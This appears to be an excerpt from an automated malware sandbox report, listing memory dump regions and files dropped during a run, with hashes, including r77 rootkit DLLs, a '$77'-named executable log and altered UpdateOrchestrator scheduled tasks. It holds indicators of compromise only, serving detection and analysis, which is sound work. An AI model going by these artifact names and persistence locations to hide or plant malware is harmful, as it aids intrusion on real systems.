memory/1156-273-0x0000012E87050000-0x0000012E8707A000-memory.dmp

memory/1156-274-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

memory/1132-271-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

memory/1132-270-0x0000028413960000-0x000002841398A000-memory.dmp

memory/996-268-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

memory/996-267-0x0000017A49660000-0x0000017A4968A000-memory.dmp

memory/920-260-0x000002588E6A0000-0x000002588E6CA000-memory.dmp

memory/736-258-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

memory/736-257-0x000001D726B90000-0x000001D726BBA000-memory.dmp

memory/668-248-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

memory/612-244-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

memory/612-243-0x000001C7E7CA0000-0x000001C7E7CCA000-memory.dmp

memory/612-242-0x000001C7E7860000-0x000001C7E7883000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\compile.bat

MD5 91128da441ad667b8c54ebeadeca7525
SHA1 24b5c77fb68db64cba27c338e4373a455111a8cc
SHA256 50801c4db374acec11831bf7602cd2635bc8964800c67217b25683dce4a45873
SHA512 bd2a8bc4458b1bc85c5a59db872278197bb0a2a2086a1a9aa5b6b876965b9f5586959171f334237588cc6b0f9643f580db2e959f82e451f4a3043a27e4a95cdd

C:\Users\Admin\AppData\Local\Temp\xwizard.exe

MD5 df991217f1cfadd9acfa56f878da5ee7
SHA1 0b03b34cfb2985a840db279778ca828e69813116
SHA256 deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112
SHA512 175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316

C:\Users\Admin\AppData\Local\Temp\xwizard.cfg

MD5 ae8eed5a6b1470aec0e7fece8b0669ef
SHA1 ca0e896f90c38f3a8bc679ea14c808726d8ef730
SHA256 3f6ca2bc068c8436044daab867f8ff8f75060048b29882cb2ac9fdef1800df9e
SHA512 e79d04f4041edb867fd6bdf4485f78352292782d9405ba81888a1bc62f5039cc46c6cc786ba1fd53284baafa7128e0f875390cb573584ed2d03c3b33c7f93eb6

C:\Users\Admin\AppData\Local\Temp\bhvE85C.tmp

MD5 05832cd24a350bd56653c6b8e5c3261b
SHA1 732ac434acbb0435e1b19dc2c5083b325d0fd682
SHA256 7e211d358d3429e4cdb9c7c6b1a5178d3f7874769dfc4c7d2b5d345e518b2e60
SHA512 0fd73d72feb4fc99894e00529992b0af85b26ba73b0afef689a9b996ca172e809cb0344c56364aa3f727394e950895e6b9ec58590c9e12427d221aed6396e579

C:\Users\Admin\AppData\Local\Temp\whysosad

MD5 fc3c88c2080884d6c995d48e172fbc4f
SHA1 cb1dcc479ad2533f390786b0480f66296b847ad3
SHA256 1637ce704a463bd3c91a38aa02d1030107670f91ee3f0dd4fa13d07a77ba2664
SHA512 4807d3bd44a3197d1a9dcf709a1e70e1cf3bf71fe1a9fa1479441b598154c282a620208557a4415a34d23ceb4fd32dda41edbb940b46acb2f00c696648703bf1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 1e8e2076314d54dd72e7ee09ff8a52ab
SHA1 5fd0a67671430f66237f483eef39ff599b892272
SHA256 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA512 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 0b990e24f1e839462c0ac35fef1d119e
SHA1 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256 a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512 c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1 a3879621f9493414d497ea6d70fbf17e283d5c08
SHA256 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA512 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 7d612892b20e70250dbd00d0cdd4f09b
SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 8abf2d6067c6f3191a015f84aa9b6efe
SHA1 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256 ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512 c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x64.dll

MD5 f876b8ce91d572547ea79104f3f24f48
SHA1 a154133be4547d099f4aefb9a5abbd55b02649be
SHA256 c1b0a94a72e64e31c5912101b759fd72d24785fd54e5e1433ebc43697f087d2c
SHA512 f3cafef52883788a12002458e382323f256b380bceacde67c919de5eb38a618db10e3cf53354787c8eddef1e1b29a1d3f97648deb1840bae5ac54af95343bcee

C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x86.dll

MD5 ecfb232ae47a07667a5850104ebebe26
SHA1 53db1507d46209797cad3d4029964cdfea708d8e
SHA256 6bc8e296f6935f5688234c3810f0326faebd898688688dfe3d5475e19cc5a83a
SHA512 6cd882dd1d11ee348ab4c287bc885af780e9fc79c7028d6f682c16bdda08888d67d98ab463e53e7243efe90ced9214d0aedfc460826082b09745b4a470cb0dbf

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77Stellacy.exe.log

MD5 2362dcc9d262d0969898b143fb7fc91a
SHA1 2240860a675c86425f5702b501eac121bfb744eb
SHA256 4f7cff601d97caf1e0040bc2d63ccadd27294b2e551ff4167e0b080c69a915b0
SHA512 59cb7e53dc9cc02f25216cc87115403ed67fb5d24947ef2e803cd54e9f118d5d65a71817b05642c238ca48eb7bfd228d008d92e42023f2c15755c64c88f5b0d6